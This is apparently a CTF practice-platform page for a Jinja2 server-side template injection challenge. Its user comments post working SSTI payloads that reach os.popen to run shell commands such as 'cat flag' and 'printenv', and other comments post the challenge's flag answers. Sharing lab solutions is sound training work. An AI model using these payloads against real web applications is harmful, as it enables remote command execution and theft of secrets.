Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15954
提  示:
描  述:
Simple_SSTI_2
评论
HK1ng 25天前

详解:https://blog.csdn.net/m0_59527104/article/details/147013776

回复 1

smtall 1月前

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0

hao7 5月前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

超爱西西鸭 8月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 8月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0

不会写代码的菜鸟 9月前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 8月前

因为没有import os,os是未定义的

回复 4

q1152874733 9月前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 10月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 10月前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 10月前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

19933663636 攻破了该题 7小时前
zyy 攻破了该题 2天前
不上早八 攻破了该题 4天前
qieding 攻破了该题 5天前
JEB_Bem 攻破了该题 5天前
wuqulds 攻破了该题 6天前
IsPP 攻破了该题 6天前
jiayouya 攻破了该题 7天前
Sadoshi 攻破了该题 9天前
1720713439 攻破了该题 9天前
18075013015 攻破了该题 9天前
自由魂儿儿儿 攻破了该题 9天前
forces 攻破了该题 9天前
w1w2w3666 攻破了该题 11天前
GnawKing 攻破了该题 11天前
DBON 攻破了该题 13天前
zhangq1022 攻破了该题 15天前
yuloong 攻破了该题 15天前
刘刘 攻破了该题 15天前
leefghjs 攻破了该题 16天前
问题反馈